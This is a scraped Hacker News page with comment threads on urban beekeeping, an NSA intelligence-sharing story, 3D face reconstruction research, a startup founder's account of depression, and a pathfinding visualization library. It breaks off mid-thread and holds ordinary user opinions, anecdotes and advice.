Great article!

We're on our 3rd season beekeeping; we just collected honey, last night.

In fact, I got my first ever bee/wasp/hornet sting ever, last night, from one of our bees. I was being sloppy, wearing running shoes under my bee suit, instead of boots. It hardly hurt at all, though. (I've had worse mosquito bites; so far, horseflies are the worst bites/stings I've ever had).

We captured our first swarm, this year, and got another hive "for free." Woo hoo!

As far as ordering stuff, since somebody mentioned it, we just go to http://www.beekeepers.com/ to get our gear, since our local farm stores don't carry much.

I am interested in these projects, so I can get my bee geek on, but I don't know if I should commit the time and money to them (any success stories out there)? http://www.opensourcebeehives.net/ http://opensourceecology.org/wiki/Beekeeping http://openenergymonitor.org/emon/node/102

16
mathattack 1 day ago 0 replies      
"Undeterred, I installed the bees on the roof of my Brooklyn apartment and began the absurd process of learning how to keep them alive. Incredibly, they flourished, and by October I had perhaps 70,000 bees..."

That has to make one unpopular with the neighbors.

17
ncourage 2 days ago 1 reply      
I don't know why I didn't expect this, but this article was the most interesting thing I've read all day. It made me almost feel compassion for the bee hive by my mailbox (if you can call it that), in a hole in the grass. We've tried to be rid of them.
18
orenjacob 2 days ago 0 replies      
For those interested, Beekeeping For Dummies (http://www.amazon.com/dp/0470430656) is actually quite a good way to start.We've had our queen replaced by our swarm and it was quite an amazing thing to witness.Our hive/swarm gave more than 40 pounds of honey a year and we kept our whole street well fed with local honey for a few years.And my garden almost doubled in productivity once the bees were in place.A win all around.Sadly a family member developed an allergy so we have to discontinue keeping bees, but it was amazing while we had them and I strongly keeping bees to anyone interested.
19
andyl 2 days ago 0 replies      
I have two hives in the yard. (Palo Alto) We produce 10-20 gallons of honey per year. Fun to harvest - kids love to get hands-on. Fun to give away esp to random strangers.
20
brianbreslin 2 days ago 2 replies      
My biggest fear of putting a beehive in my parents yard is that it would result in my dog getting stung or my parents.
21
Elzair 2 days ago 1 reply      
Is Colony Collapse Disorder largely affecting only domesticated beehives?
22
Thesaurus 2 days ago 0 replies      
I can't believe I read that whole thing, it was written so well. Quite informative and very interesting.
23
hywel 2 days ago 2 replies      
Kept waiting for this to turn out to be an allegory about a startup.
24
McDoku 2 days ago 2 replies      
This is so meta.
18
Israels N.S.A. Scandal
336 points by not_that_noob  1 day ago   127 comments top 12
1
CamperBob2 1 day ago 3 replies      
Instead of being buried at the end of the article, Bamford's penultimate paragraph

   In Moscow, Mr. Snowden told me that the document    reminded him of the F.B.I.s overreach during the days    of J. Edgar Hoover, when the bureau abused its powers to    monitor and harass political activists. Its much like    how the F.B.I. tried to use Martin Luther Kings    infidelity to talk him into killing himself, he said.    We said those kinds of things were inappropriate back    in the 60s. Why are we doing that now? Why are we    getting involved in this again?
... should be cut-and-pasted into any comment thread where a security-state apologist is trying to make people believe that Snowden is anything other than a patriot.

We can't fix this by working within the system. That's what the Church Committee tried to do. They failed. There is no reason to think their twenty-first century counterparts will not fail again.

2
jostmey 1 day ago 2 replies      
I think this is the most damning leak to date. There is no justification for freely giving information to Israel. And the part about people's porn habits being tracked is even scarier. That could be used to discredit virtually anyone (well, any male at least). Who hasn't visited an embarrassing porn website at least once in their life ? Now imagine your name being publicly associated with that website.
3
guelo 1 day ago 2 replies      
The way Israel owns American military and foreign policy should be a national shame. Reminds me of this other story about Israel going behind Obama's back to get weapons straight from the Pentagon. http://online.wsj.com/articles/u-s-sway-over-israel-on-gaza-...
4
rrggrr 1 day ago 0 replies      
This was not a one-sided trade. You can be sure the NSA received similar feeds from Israel on targets of great interest to US national interests. The inherent problem in these NSA debates is the inability of the NSA or policy makers to give the American people believable metrics that describe the value received for the effort. Could it be the US received important intel in return for its feeds? Yes. By not articulating a believable ROI on collection or sharing its looks increasingly like there wasn't one.
5
autism_hurts 1 day ago 2 replies      
Palantir has their hand in all of this.
6
BugBrother 1 day ago 0 replies      
A discussion of Unit 8200 I read today: http://strategypage.com/htmw/htintel/articles/20140923.aspx

(I read other sources because my Swedish media is like some inverse of Fox News. Stories like that Hamas had admitted murdering the three teens that started the last war is not... emphasized. The biggest morning newspaper didn't even mention that the accused murders of those teens died in a firefight today. Pallywood was never mentioned. Neither torture between Palestinian groups. Etc.)

7
javajosh 1 day ago 0 replies      
I think this all is going to take time to sink in, but in the end, Americans will do the right thing, which has been the overwhelming trend in the past. Think slavery. Think women's suffrage. Think civil rights. Think gay marriage.

This one is a little tough because the targets are unsympathetic and the anecdotes of specific harm are non-existent. It's difficult to argue against fighting dirty as a principle; it's much easier when you can point to a specific person (like MLK) and say, "That dude was clearly wronged."

I wish it was different. I wish people got more upset about government fighting dirty against anyone[1], even against the enemies that we ourselves agree are despicable and evil. Fighting dirty hurts us far more than it hurts them, because it damages our moral identity.

[1] The one exception is if there is an existential threat to the US. However, terrorism has never been, and will never be, an existential threat to the US[2] - except insofar as, in a fit of epic but unfunny irony, they manage to manipulate us into destroying our own moral fabric.

[2] The same argument applies to Israel. Israel playing dirty against state actors like Iran would be far more defensible, because Iran really could wipe Israel out.

8
not_that_noob 1 day ago 4 replies      
Why was the title changed? Here's the operative paragraph from the article below - there is a document that indicates the NSA is spying on porn visits of ordinary Americans to use against them in intimidation for exercising their rights to free speech. It doesn't get any worse than this.

"It should also trouble Americans that the N.S.A. could head down a similar path in this country. Indeed, there is some indication, from a top-secret 2012 document from Mr. Snowdens leaked files that I saw last year, that it already is. The document, from Gen. Keith B. Alexander, then the director of the N.S.A., notes that the agency had been compiling records of visits to pornographic websites and proposes using that information to damage the reputations of people whom the agency considers radicalizers not necessarily terrorists, but those attempting, through the use of incendiary speech, to radicalize others. (The Huffington Post has published a redacted version of the document.)"

[Edit] For reference, the original title was: "NSA spying on porn visits of ordinary Americans" - which is exactly what they seem to be doing.

9
rasz_pl 1 day ago 1 reply      
> it would first be minimized, meaning that names and other personally identifiable information would be removed.

minimized?? Im pretty sure he meant Anonymized

10
shna 1 day ago 0 replies      
Sounds like U.S. has not been a sovereign country for sometime. It's intelligence service has been working for another country, passing sensitive information of its own citizens to Israel. Interesting. Even more interesting is that the bulk of the comments are on somewhere else whether this is a witch hunt or not, if it resembles to what Mr. Hoover did or did not do, if the committee in the past succeeded or not.
11
ronreiter 1 day ago 2 replies      
The US is a close ally of Israel for obvious reasons. Israel wants to better defend itself, so it co-operates with the N.S.A. This is what Israel needs to defend itself, and Israel probably does the same thing to help defend the US.

There will always be a conflict between privacy and security, you can stick to one on expense of the other, but you will never be able to "fix" things.

12
bengrunfeld 1 day ago 3 replies      
Israel's Arab civilian's regularly attempt to blow themselves up in public places (believe me, I've stopped a few on them myself). Meanwhile the Palestinians gleefully lob rockets at populated cities in Israel. Of course Israel would want to monitor them as much as possible, and corroborate with the NSA to get as much data as possible. If that monitoring saved YOUR child from getting blown up on a bus, wouldn't you support it, or would you prefer your kid gets blown to smithereens so that social justice can be upheld? There's a big difference between America's domestic surveillance program and Israel's. Last time I checked, the central USA hadn't just recently been shelled.
19
Total Moving Face Reconstruction
306 points by mxfh  2 days ago   92 comments top 18
1
bsenftner 1 day ago 2 replies      
I run a startup specializing in this space called the 3D Avatar Store (www.3d-avatar-store.com).

3D Reconstruction of human faces is literally on the edge of mainstream. I'm betting on it, personally.

Our system is similar as theirs, but more general: we laser scanned 300,000 real people and then associated each laser scan with dozens of photos of that person taken from different angles, lighting conditions and expressions. That data set was then used for a neural net training - actually a pipeline of neural nets.

We can accept 1 photo and get back a good quality 3D model, or a series of photos and get better quality, or HD quality video and get back frame by frame, in expression reconstructions just like their solution. In fact, our system is able to recover 36 people per video feed in real time, as well as handle 4 video feeds at once. We don't need as much reference information as they do, because we trained our system to generally understand the human facial form, rather than their solution that operates in isolation for a single reconstruction operation.

Our current system is targeted as a WebAPI for games and serious simulations - enabling 3rd parties to implement "put yourself in the game" functionality. As such we have 3 different geometry outputs aimed at game/simulation developers. We also do facial recognition, and we have a special "forensic" output for that.

Our current "best output" is purposely "Pixar like" rather than realistic. Taking them realistic tends to freak people out - especially women (seems like our culture has trained women to have an idealized self image, and when presented with their non-mirror true form, they don't like it.)

You can learn more at these links:https://3d-avatar-store.com/Web-API-Features-May-2014https://3d-avatar-store.com/3D-Avatar-Creation-walkthruhttps://3d-avatar-store.com/New-Face-Finder

2
phkahler 1 day ago 2 replies      
I like that they show cases where it has problems. It's very much "here's what we can do, and here's where it doesn't work." There is no hype, no claims of "novelty", no speculation on uses, just results. I wish this were far more common.
3
hunvreus 2 days ago 2 replies      
Can't help but think of "The Running Man" watching Schwarzenegger's face being rendered in 3D.

It's terrifying to think that in the next 5 to 10 years we won't be able to distinguish a forged, high definition video of pretty much anybody.

4
anigbrowl 2 days ago 4 replies      
Somewhat off-topic, but I wonder why facial recognition/modeling experts seem to persistently ignore ears and jawline. As someone who works in film and does some picture editing (though it's not my primary skillset), ears are just as individual as other parts of the face, and they're one of the trickiest things for makeup artists to work on. As CG in movies and videogames keeps improving, my suspension of disbelief is often broken by noticing problems with the ears, eg watching a CG anime film and noticing that everyone has the same ear shape.
5
sabalaba 2 days ago 1 reply      
3D reconstruction is used in state-of-the-art facial recognition as well.[1] Essentially you reconstruct the face in 3D, rotate the 3D model to the front, project it back into 2 dimensions, and then feed it through a CNN with deep architecture. Because this gives you very good alignment, you can do tricks like not having shared weights across the entire image. That is, each section of the input vector is known to correspond to a certain part of the face and thus can learn unique parameters that are well suited for that specific region.

The paper claims that it takes about 105 seconds to render a single frame. So one second of 30 fps video would take about 52 minutes to render. I would have to read more in depth to see what kind of savings can be had by sharing information across frames. (The paper also doesn't mention the use of GPU acceleration.)

[1] https://www.facebook.com/publications/546316888800776/

6
macca321 1 day ago 2 replies      
I think I'm missing the point. Why are all the reconstructed videos from the same angle? It would demonstrate it better if they repositioned the camera.
7
daniel_reetz 2 days ago 2 replies      
I'd like to ask the authors how they managed to do such great/natural looking reconstructions of the eyes. Eyes are tough because they're naturally specular, transparent in places, and refractive.
8
Harshit15 1 day ago 0 replies      
This can help a lot in recreating the faces of avatars, in animated movies and games. They have tough time tracking facial details using small markers.I was wondering using shadow and shine removal to solve the issues shown in end. An example here is implemented by these autonomous car designers detailed as shadow correction:http://www.igvc.org/design/2013/US%20Naval%20Academy.pdf
9
imaginenore 2 days ago 4 replies      
This kind of advancements is one of the reasons I don't post photos of myself online. In a few years we will be capable of making videos with anybody's face replaced with anybody else's. It will be trivial to produce a fake video that can cause all kinds of legal troubles.

And yes, I realize it's even possible now, but with all the new algos and software coming out it will be easy enough for somebody to just mess with people's lives for fun.

10
aresant 2 days ago 0 replies      
Technology likes this makes me wonder how long of a shelf-life video "evidence" has.

Or perhaps these same algos will also provide utility in detecting / decoding "fakes", sort of like edge-tracking / error level analysis etc today.

11
tantalor 1 day ago 0 replies      
Tragic they removed the verbal audio from the demo video. It would have been much easier to judge the visual accuracy if the reconstructed lip motion were combined the original sound.
12
Aqwis 2 days ago 1 reply      
Very impressive. How large does the photo collection of the individual have to be to achieve results like those in the video?
13
igriffer 1 day ago 0 replies      
Hi! Anybody have some sources? I want to touch this method =)This 3D reconstructions are the best material for the face recognition!
14
31reasons 1 day ago 0 replies      
This + Virtual Gesture Tracking + VR = Virtual Meetings
15
SnowProblem 2 days ago 0 replies      
This will be huge for VR.
16
polskibus 1 day ago 0 replies      
The question that burns me is - when will we see this amazing algorithm implemented as part of OpenCV ?
17
debt 2 days ago 1 reply      
I've been increasingly interested in the Face. Human beings must have some incredible mental calculations going on when parsing a face. We're an evolved species that use the face as a form of communication.

I love the attached video in the link because it isolates perfectly the face. If you look closely you can see these tiny minute combinations within the face as each person talks; the eyes shifting, the face rotating, looking in various directions, the forehead crunching, the eyebrows raising, smiling, etc. All of these "cues" combine to create a message that we interpret instantly.

The face has inspired me lately to read more into this subject as it seems, at least on the surface, to be an extremely complex innate human ability; facial recognition.

18
Htsthbjig 1 day ago 0 replies      
Quite dangerous what this technology will mean in the future, they could manufacture evidence against you, publish it, and then let the masses lynch you.

I think this is what happened to the recent decapitation videos, they were reconstructed from home videos.

IMO the videos with the people dead in the floor are true, but the videos where they talk are staged.

Today we know there was a CIA team whose job was faking videos of Osama Bin laden:http://blog.washingtonpost.com/spy-talk/2010/05/cia_group_ha...

Remember Osama Bin Ladem appeared and disappeared according to US army interest at the time, finally ending in very strange circumstances(and being buried on the ocean, not letting anyone else interantionally to confirm(by DNA) he was Osama).

For me it is staged because current technology could synthesize a voice only if there are not strong emotions. The same happens with the voice.

With strong emotions it becomes very easy for familiars and friends to notice as people do specific gestures and most of them are not recorded in video.

That people are perfectly calm before dying I could understand, but that they do while saying exactly what their captors want I can't.

Also, before the videos most of the population in UK did not want to go to war, after the videos(with a UK native), most of them support war, quo prodis?

20
A Long, Ugly Year of Depression Thats Finally Fading
309 points by squiggy22  5 days ago   128 comments top 27
1
karmajunkie 5 days ago 0 replies      
Man, there are a lot of diagnoses getting thrown around this thread. As a caregiver to someone with a serious illness, as well as someone who periodically suffers from many of the same mental and emotional issues raised here... How about refraining from doing that unless you are A) a mental health or otherwise trained medical professional; and B) someone who has actually seen and assessed the patient. I'm not calling out anyone in particular because let's face it, this is HN and we're probably all know-it-alls at one time or another, but this can have some particularly pronounced thoughts and effects on the posters who are getting the comments.

If you are dealing with any of these issues, my heart goes out to you. Please reach out to a counselor, or at the very least a counselor or therapist who specializes in the things you're dealing with. If you need help finding one, my email is in my profile, i'm glad to help.

2
tst 5 days ago 4 replies      
I'm also recovering from a depression which lasted for quite a while. It absolutely sucks because you think you're worthless, nobody loves you, you can't get anything right and the best would be if you just wouldn't exist anymore.

And on top of that you isolate yourself. I know how hard it was to ask for help therefore I want to show you some things which helped me:

- Realize that your depression is lying to you. It doesn't tell the truth. It makes you believe that something is logical even if it isn't.

- Read 'Feeling Good' - terrible title, great book. It will probably work better than average on the average HN reader because it takes a 'rational' approach to depression (cognitive-behavioral therapy). It helps you to recognize destructive thought patterns and how to deal with them.

- Garbage in, garbage out. What works for computers also works for your body. Yeah, you're a geek but you can eat some vegs instead of the 500th pizza. Also working out (or other sports) are pretty great.

- Long term: Therapy which tries to work on the root cause and not just at symptoms.

Finally, here's a rather extensive list with lectures, books, exercises, etc. which help dealing with depression [1]. Back when I was fed up with feeling crap I created a spreadsheet with the 8 activities and tracked those every day.

Note: Every person seem to react to differently. I read about people who improved a lot by meditating - on the other hand, it didn't work for me.

So, try some things out and don't give up. You can beat that liar in your head.

[0]: http://www.amazon.com/Feeling-Good-The-Mood-Therapy/dp/03808...

[1]: http://www.reddit.com/r/getting_over_it/comments/1nd14u/the_...

PS: If you have any questions feel free to ask - if you want to send me a private one write at <username> @ panictank.net

3
dchuk 5 days ago 3 replies      
I guess I'll be the only person to comment on the actual Moz business struggles rather than the depression side of this post. Moz raised their money at a really tricky time because it was right before Google essentially bent over the SEO industry. When Rand mentions the Content tool that hasn't even started being developed, that was something that was supposed to take your Google Analytics keyword referrer data and match it to your content and your rankings and your links and your competitors and basically help you spot keywords and content you can easily rank better for.

The timeline seems to be matching up where they had this plan for this tool before any of the Google SSL stuff started, so as they started working on the design and UX of it, Google started rolling out the SSL stuff and it basically ruined their idea. Moz ended up adding tools to try and guess what keywords made up your "(not provided)" data but that's a far cry from what they were originally planning.

I'm basing this entirely on being heavily involved in the SEO industry around the times mentioned in Rand's article and having even run a successful SEO SaaS product (which is still going even though I've moved on to other projects). I just remember seeing screenshots of what they wanted to build and thinking "wow, if they can nail this, it will be great". I wanted to build a similar app. But when Google started hiding all organic keyword data in analytics, I distinctly remember saying "Well there goes Moz's whole new product".

Google really fucked the SEO world up with their (not provided) move. Think what you will about SEO but it's still a legitimate marketing channel and I really have never been able to understand why Google thinks it's ok to not share your organic keyword data but your paid keyword data is totally fine to share with site owners.

But not much anyone can do about that now I suppose.

4
jtbigwoo 5 days ago 0 replies      
>> ...layoffs is a Pandoras Box-type word at a startup. Dont use it unless youre really being transparent (and not just fearful and overly panicked as I was).

I made a similar mistake once as a manager and experienced this kind of thing more than once as an employee. Certain words like "layoffs" or "merger" are so loaded because employees know that you know more than they do. Even if you think you're being totally transparent, employees are correct to assume that you're holding some things back because you are. It's your job to understand the state and direction of the company and give your employees the information they need to do their jobs. Employees, especially the smart ones, are going to try to infer additional information from what you tell them even when you think you've told them everything they need to know. Leaders need to be aware that a certain amount of "Kremlinology" happens in every company.

He made things worse by being vague about the company's real situation and contradicting himself a couple sentences later when he said, "...we'll survive (though not with much headroom..." If he's talking about layoffs, who is this "we"? Everybody? Rand and Sarah? If you're going to be transparent, you also need to be specific and direct. A better approach might have been, "Sarah and I modeled out some worst-case scenarios last week and this stretches our break-even point an extra six months, which will constrain our growth."

5
astockwell 5 days ago 0 replies      
Speaking purely to the experiences of building a new software product, I've seen this exact story play out countless times. Everyone (except maybe the engineers themselves) seems to think that designing a software product is part of the "planning phase", and thus should happen before any time is "wasted" on development:

> "That product planning led to an immense series of wireframes and comps (visual designs of what the product would look like and how it would function) that numbered into the hundreds of screens..."

The biggest contributor to this I've seen is the dozens (hundreds? thousands?) of small ways that a design (done in a vacuum, without simultaneous prototyping) will differ from established development patterns, frameworks, and other pre-packaged solutions that engineers use daily to avoid reinventing every wheel. And engineers respond with timelines that expect to be able to leverage those frameworks. Thus the dissonance begins.

One example: a design calls for a form to be broken across 4 pages. There may be great aesthetic rationale or even user testing to support this, but that means that in all likelyhood any framework (e.g. Rails/Flask/Play/etc, not to mention native apps) will have to have additional modification to support sessions, changes to validation, changes to the auth domain, persistence changes, etc. And it's not necessary for an MVP. And many times these differences are much more subtle and deeply entrenched, and would require rethinking much of the wireframes/designs to align with development patterns. /rant

I'm not sure what the answer is here, except maybe that this is one more point in favor of having a "technical founder" or in general a technical person with decision-making authority, to avoid going down a road without proofing out your ideas or timelines.

6
Alex3917 5 days ago 0 replies      
> "the funny thing is, Marijuana doesnt have any pain-killing properties. It just lessens tension, anxiety, and stress for some people."

Marijuana is an analgesic. But in this case the effects are stemming from the fact that's its an anti inflammatory, so that the fluid in your disc is no longer compressing the spinal nerves. And the fact that it reduces anxiety also reduces inflammation even further, since anxiety is probably largely what was causing the inflammation.

7
johnyzee 5 days ago 0 replies      
I love it when CEO's own up like this, it's probably one of the most appealing traits in a leader I personally can think of. As long as they don't become too insecure to actually lead, introspection and self-criticism are strengths, not weaknesses. Besides, being aware of these traits and their negative repercussions put you in a pretty good place, the ones who really suffer are the guys who repress and deny the down slopes, always happy and bubbly on the outside but in reality inches from a mental breakdown.

The last part about how stress causes physical health problems is very important, and very overlooked. Besides the muscle and nervous tension the OP mentioned, stress seriously reduces immunity which can manifest itself in a myriad of unexpected ways (whichever subsystem fails first), from infections to cysts and all kinds of nastiness.

8
gadders 5 days ago 0 replies      
One last comment - this post from Rand reminds me of the following from Ben Horowitz:

"By far the most difficult skill for me to learn as CEO was the ability to manage my own psychology. Organizational design, process design, metrics, hiring and firing were all relatively straightforward skills to master compared to keeping my mind in check. Over the years, Ive spoken to hundreds of CEOs all with the same experience. Nonetheless, very few people talk about it and I have never read anything on the topic. Its like the fight club of management: The first rule of the CEO psychological meltdown is dont talk about the psychological meltdown."

http://www.bhorowitz.com/what_s_the_most_difficult_ceo_skill...

9
mikeleeorg 5 days ago 0 replies      
This is an incredibly brave, and hopefully cathartic post by someone I greatly admire. I really hope he is able to find the support and peace he needs.

As a bit of an aside, I wonder how much of this has led to similar troubles for other founders:

When the Foundry investment closed, we redoubled our efforts to build Moz Analytics. We hired more aggressively (and briefly had a $12,000 referral bonus for engineers that ended up bringing in mostly wrong kinds of candidates along with creating some internal culture issues), and spent months planning the fine details of the product.

I've heard from friends & colleagues about the massive amount of pressure they've felt after closing an investment round. While fundraising is already an incredibly trying process, the next stage is sometimes even more difficult.

In contrast, other friends & colleagues who've opted for the bootstrapped route (either by choice or circumstance) haven't seemed to face a similar massive amount of pressure. Yes, they faced incredible stress too, but not to the level of those that have raised capital.

This is merely an anecdotal observation made in my peer group. I don't mean to imply that this is some kind of phenomenon. And clinical depression is something that can cut through any kind of circumstance.

I just can't help but notice the stark difference in stress level of founders who are growing organically & carefully vs founders who are in a mad recruiting rush and sometimes hire the wrong kind of people. I wonder how much of a relationship there is between having the right kind of people in your company vs the wrong kind of people, and the stress level of a founder. I would imagine a lot.

10
bocalogic 5 days ago 1 reply      
I respect Rand and give him a lot of credit for vocalizing his challenges. Depression is a challenge and it can be overcome.

I am not a doctor, but I can tell you that a lot of my peers are suffering from depression from business, marriage or just in general.

One thing I do know is that the world has changed a lot in the past decade. The price of everything just keeps going up and we are constantly bombarded by information. Humans are not built that way. There is no badge of honor for being under stress 24/7. It will catch up to you one way or the other.

Humans suffer from the fight or flight responses that we encounter during high stress situations. The challenge is to digest it and make decisions not based on fight or flight emotions.

The body produces cortisol when we are under duress and it is horrible for you. It screws up everything with your body and your mind. One way to counteract this is by working out, getting sunlight, eating the right foods and staying off caffeine. Try some black or green tea instead.

30 minutes of working out will combat cortisol production for about six hours. Even going for a walk helps a lot.

Most of the worlds brightest minds and most successful people suffer from depression and knowing that your ARE NOT ALONE is a huge step forward.

You can beat depression and your life will turn around!

Talking about it and seeking help is definitely a step in the right direction. Keep your chins up.

11
raheemm 5 days ago 0 replies      
So few people and places can allow for this level of vulnerability and authenticity. This post is going to help a lot of people.

I have even more respect for Rand and Moz. We can say Fail Fast, Fail this, fail that ... but this kind of writing is the true embrace of failure, learning, wisdom, humanity.

12
gadders 5 days ago 4 replies      
I admire what Moz has done and it was an interesting read.

My comment is more of a meta one about HN. Are we really that interested in these stories of depression? We seem to get at least one a week. I realise it's an issue that may affect people here, but I'm not sure if we need the volume we are seeing now.

13
jroseattle 5 days ago 0 replies      
I read through this and the Can't Sleep/Loop post, which had me wiping my eyes. I feel I'm there, right now.

We're in the middle of raising money, while I also keep the engineering ship moving forward with product releases. We're about to run out of initial seed money, as we were supposed to have brought in the balance of the round and been on to Series A at this point. It's challenging, but I feel like I'm handling it.

Or so I thought. It turns out, I'm getting little sleep right now -- maybe 4-5 hours a night, on average. I've gained back so much weight and I abhor seeing myself in photos. I watch colleagues take absurd plans to investors and get way overfunded, more than they were ever asking to take on, while our little operation that's actually generating revenue (we will likely be break-even in 6 months) gets passed. I know it's not a rational reaction, but still the mental headwinds it creates really sap my soul.

It sucks when you're a (very) logical being, and something in your head no longer fits into place. I'm short with my kids at home, and I literally dread downtime. I find that cocktails go down easy, really easy.

It's a loop, alright.

14
danielweber 5 days ago 1 reply      
Slightly OT, but I read the whole thing thinking Moz was a nickname for Mozilla, or, at the least, that Moz was related to Mozilla.

It's still good to get these stories.

15
swombat 5 days ago 9 replies      
Forgive my ignorance and bluntness, but reading the above, it sounds more like an anxiety disorder than like depression. Both are serious, but I'm not sure if it helps to confuse the two?

I've not experienced either seriously, but I know people who have. Depression seems to be more about things not mattering anymore, everything being pointless, the world seeming drab and just not fun anymore, rather than feeling that everything is going to go to shit. Anxiety, though, (and I'm speaking from experience here, having had some light anxiety attacks caused by too much regular caffeine usage) seems to be characterised by a feeling of impending doom, that everything is wrong, it can't be fixed, it's all hopeless, etc. But in my (mild) anxiety attacks, like Rand, I still cared about the outcome. I just felt like there were too many problems to solve, overwhelmed, ready to say "fuck this", give up the entire thing, and start again from scratch with something completely different.

PS: Otherwise, props for the very honest and open article. Running a business is a lot of responsibility and very stressful and it can be comforting to know you're not the only who seems surrounded by world-ending scenarios.

16
karl24 5 days ago 0 replies      
Mental illness impacts more people than cancer, diabetes, or heart disease. Unfortunately only 1/3 of people who have the illness get treatment due to cost, access, stigma, etc.

We're working on an app that uses technology to help bring clinically proven treatments to market at a price point that dramatically improve access. We are pairing this with product design that's common on the consumer web but uncommon in mental health apps to help with adherence and engagement with treatment.

I hope this isn't perceived as attempting to capitalize on a serious thread. We (the founders) have incredibly personal reasons for perusing this problem. Many in this thread are likely ideal early adopters for the product. The general awareness that this discussion is raising is a good opportunity to reach out and ask for help as helping us will ultimately help many others.

Two ways to help:

(1) 7 question survey, < 1 min to complete: http://bit.ly/1plE2Rg

(2) contact us directly via cbtmobileapp@gmail.com if you'd like to provide insight via a more in-depth interview.

17
marklittlewood 5 days ago 0 replies      
Depression in technology is a very common condition. If you suffer from it, please know you ARE NOT ALONE. This talk is very honest, open and has some really helpful and practical advice.

http://businessofsoftware.org/2013/11/developers-entrepreneu...

18
akrymski 4 days ago 0 replies      
I've been through this at every startup I founded, but managed to pull through in the end - and I'm still hoping this startup won't be any different. I struggle to imagine if any CEO has not had a tough time like this and felt utterly depressed at least once when things weren't working out. Rather than focus on the depression aspect however, why not discuss what COULD have been done better, and what Rand and other CEOs can learn from this - because ultimately there's an important lesson there besides "depression sucks":

- Don't bet your whole business on one product. Products come and go, businesses pivot. Remember how Steve Jobs launched the Mac? He created a separate, small division for the Macintosh to directly compete with the rest of the company (working on Lisa - which wasn't going well actaully). That's genius. He knew Mac is a risky project that could well take much longer than anticipated. He didn't bet the whole house.

- Start as small as possible. Moz Analytics was meant to be this giant swiss army knife right? Wrong. MVP lessons still apply. Couldn't you have launched the new brand with a tiny set of core features? Broke it into a modular setup where consumers could pay for features/modules in the future as you develop them?

- Iterate. Real artists ship, remember? Agile software development and all that? Doesn't sound like you had clearly defined iterative goals that you were hitting as you went, because then you'd really have an idea for where you are in the software development process. You seemed to have to go on someone's word on this. Instead you should have been producing A product every month with an increasing set of features. That way you could have still launched on time, but with less features.

- Review your progress often, and don't loose sight of the grand mission. Being smart doesn't help here - it often makes you stubborn, and I've got the same issue. But sometimes you need to have that thc-truffle, take a step back and think how else you could allocate your resources. Are there some other opportunities that the business can simultaneously pursue with a small set of resources as a backup plan? Are there some major M&A deals that can be done to shuffle things around? Do we need to hire more staff / or let people go who aren't hitting the deadlines? Drastic times call for drastic measures. The biggest issue with depression is that deep inside you still expect things to just get better on their own. And as they don't, you feel worse. Well the bad news is they won't get better on their own. You have to do something about it.

- Don't fail to communicate. The value of your business is in its passionate community, not one product. Seems like there are lots of people passionate about SeoMoz. Instead of shutting yourself out due to what appeared to you as a product failure, perhaps you could have engaged the community in the process, help you establish the product roadmap for the features you should be rolling out first, and try to understand why 90k of sign ups failed to try out the product.

19
ryanobjc 5 days ago 2 replies      
We talk a lot about successes.

It's also good to talk about failures, both partial and more complete.

And redemption.

The road to victory is long, and I would put my back against Rand because I know this struggle has made him better.

20
autism_hurts 5 days ago 2 replies      
I cannot stress how much exercising to exhaustion daily (read: Crossfit) and eating healthy (Slow Carb / Paleo) impacted my depression.

Please try them before you medicate.

21
austengary 5 days ago 0 replies      
Not an overnight fix. But with sustained effort, meditation changed my life. Eventually other things fell in place. Diet, exercise, relationships, mental health. Buddhist teachings really helped too.

I started here. http://headspace.com

22
DanBC 5 days ago 0 replies      
Here's what the English "National Institute for Health and Care Excellence" say: https://www.nice.org.uk/guidance/CG90
23
l33tbro 5 days ago 1 reply      
As somebody who is not depressed, it is always confronting to see just how hard depressed people are on themselves.
24
x0x0 5 days ago 0 replies      
Wow, props to Rand for sharing this.

Rand, if you're reading this, two things occur:1 - you're far from the first person to go for big-bang software releases (though listening to your cto is probably a good idea)

2 - in _Fooled By Randomness_ by Taleb (I believe, I could be misremembering) he describes the incredible level of stress that monitoring his investments daily created. I seem to recall the author writing that he simply was unable to monitor them every day and instead had to only look at some periodic summaries. Perhaps this may help people who get to mentally exhausted looking at numbers daily? I mean, it's good to notice immediately if they crater, though that can be scripted. Beyond that, there's probably not much value looking at them 7 days a week that you don't get looking at them once every seven days. I use the same technique on the elliptical machine; time crawls if I look at the timer, so it's an exercise of will to go as long as possible before looking.

Hope he's in a better place now.

25
andreash 5 days ago 0 replies      
One of the most honest blog post I've ever read.
26
Siecje 5 days ago 0 replies      
alt="launch-is-moved-email"
27
thinknothing 5 days ago 0 replies      
I started writing poetry when i got depressed - www.thinknothing.co
21
PathFinding.js
331 points by WestCoastJustin  3 days ago   25 comments top 13
1
reitzensteinm 2 days ago 2 replies      
One trick I've used quite a bit in games I've written is to do a breadth-first search of the entire playfield, with no termination, resulting in data for how to get from any tile to the destination.

This has a few nice advantages:

* Breadth first is trivially broken up to iterate over multiple frames, amortizing the cost of visiting each tile

* It reduces the worst case as the number of enemies scales up but the destination counts are low.

* The implementation in general is very simple

* You can still early terminate if you keep track of the farthest distance a pathfinding layer needs to satisfy.

* No pathological, worst case situations where a playfield becomes very expensive to pathfind. An open field is the worst case.

I first used this in Robokill, a flash game which often had 20+ enemies on the same screen tracking the player. I estimated at the time that it cost about as much as doing A* on ~5 enemies.

In games, the worst (common) case is basically all that matters - a constant 60fps is significantly better than 100fps dropping to 30fps occasionally.

2
curiousAl 3 days ago 0 replies      
Wow, this is a fantastic visualization of algorithms with scary doctoral-thesis-y names.I love visualizations that make scary things simple.
3
tokenizerrr 3 days ago 1 reply      
Very nice. If the author is the submitter or sees this, could you please provide some details on what kind of libraries and techniques have gone into creating this? A blog post or something would be great.
4
newbrict 3 days ago 1 reply      
The recursive visualization is really slow on even moderately complex graphs, otherwise it's a really neat tool
5
noiv 2 days ago 0 replies      
The above pathfinder is much faster with a binary heap, https://github.com/bgrins/javascript-astar and can be heavily optimized if you know your engine. With SpiderMonkey I get fixed cost of around 1ms for initialization and it checks nearly 2000 nodes in 1ms on a 3Ghz Core Duo with a relative costly euclidean heuristic. So worst case on a 40x50 map is ~2ms. If worst case can be avoided upfront you'll always get a response within 2ms even with a 2000 nodes long path on most maps. It is amazing what one can do with JS nowadays.
6
jMyles 3 days ago 2 replies      
In my first bit of play, I just tried to find cases where Manhattan lost to the others. It seems like Manhattan is not as good when faced with a plausible path only to be thwarted at the end - is this right?

Can you show a few cases where Manhattan loses by a landslide?

7
tejon 3 days ago 0 replies      
Of course it's a gray link... but wow, major enhancements since ~1 year ago when I was on my pathfinding binge. Good stuff! Never did implement full jump-point optimization, though I got halfway there by manipulating queue priorities.
8
iandanforth 2 days ago 1 reply      
